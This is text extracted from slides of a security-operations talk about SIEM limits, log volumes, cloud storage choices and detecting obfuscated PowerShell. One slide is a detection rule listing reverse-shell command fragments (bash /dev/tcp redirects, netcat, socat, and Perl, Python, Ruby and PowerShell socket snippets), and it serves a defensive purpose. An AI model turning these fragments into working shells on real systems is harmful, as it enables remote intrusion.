5. • Financial regulations
• Country regulations
• Public cloud
• Distributed Environment
• „Follow the sun” way of working
Challenges from Security point of view
5
10. Rule based system - example
10
title: Suspicious Reverse Shell Command Line
status: experimental
description: Detects suspicious shell commands or program code that may be exected or used in command line to establish a reverse shell
logsource:
product: linux
detection:
keywords:
- 'BEGIN {s = "/inet/tcp/0/'
- 'bash -i >& /dev/tcp/'
- 'bash -i >& /dev/udp/'
- 'sh -i >$ /dev/udp/'
- 'sh -i >$ /dev/tcp/'
- '&& while read line 0<&5; do'
- '/bin/bash -c exec 5<>/dev/tcp/'
- '/bin/bash -c exec 5<>/dev/udp/'
- 'nc -e /bin/sh '
- '/bin/sh | nc'
- 'rm -f backpipe; mknod /tmp/backpipe p && nc '
- ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))'
- ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
- '/bin/sh -i <&3 >&3 2>&3'
- 'uname -a; w; id; /bin/bash -i'
- '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};'
- ";os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');"
- '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
- ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print'
- "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:"
- 'rm -f /tmp/p; mknod /tmp/p p &&'
- ' | /bin/bash | telnet '
- ',echo=0,raw tcp-listen:'
- 'nc -lvvp '
- 'xterm -display 1'
condition: keywords
11. Numbers – example region
11
55 000 data sources all over the world
150 000 events per second
700B * 150000EPS = 8.25 TB/d
Data sources
Applications 400
OS 4200
DB 900
NET 90
MDW 80
§ Data sources availability monitoring process
§ Component standardization in place (events normalization)
§ Monitor All initiative based on stack configuration (all new
assets automatically added and removed from scope)
§ Experience in building distributed multi-tenant cloud
computing and file system.
12. Cons of SIEM:
- It is mostly rule based system
- Correlation can be done only on „short”
timeframe
- Slow searching mechanism
- SIEM != Log Collector
Pros of SIEM:
- Fast rule based system
- Fast correlation engine
- Real time alerting system
12
Why something else is needed?
14. 14
Main Problem - S3(a) or HDFS?
1.Cost
2.Elasticity
3.SLA (availability and durability)
4.Performance per dollar
5.Transactional writes and data integrity
23. • task automation and configuration management framework from
Microsoft
• Command-line shell
• Scripting language
• Built-in (PS1.0) since 2006:
• WINDOWS XP SP2 / Windows Server 2003 / Windows VISTA
Powershell
23
29. • Calculates character distribution and assigns a score
• Detects Powershell obfuscation (obviously!)
Cosine Similarity
29
https://en.wikipedia.org/wiki/Cosine_similarity
30. • In Alluxio we can check baseline in a few seconds
• A few ways of accessing to data
Summary
30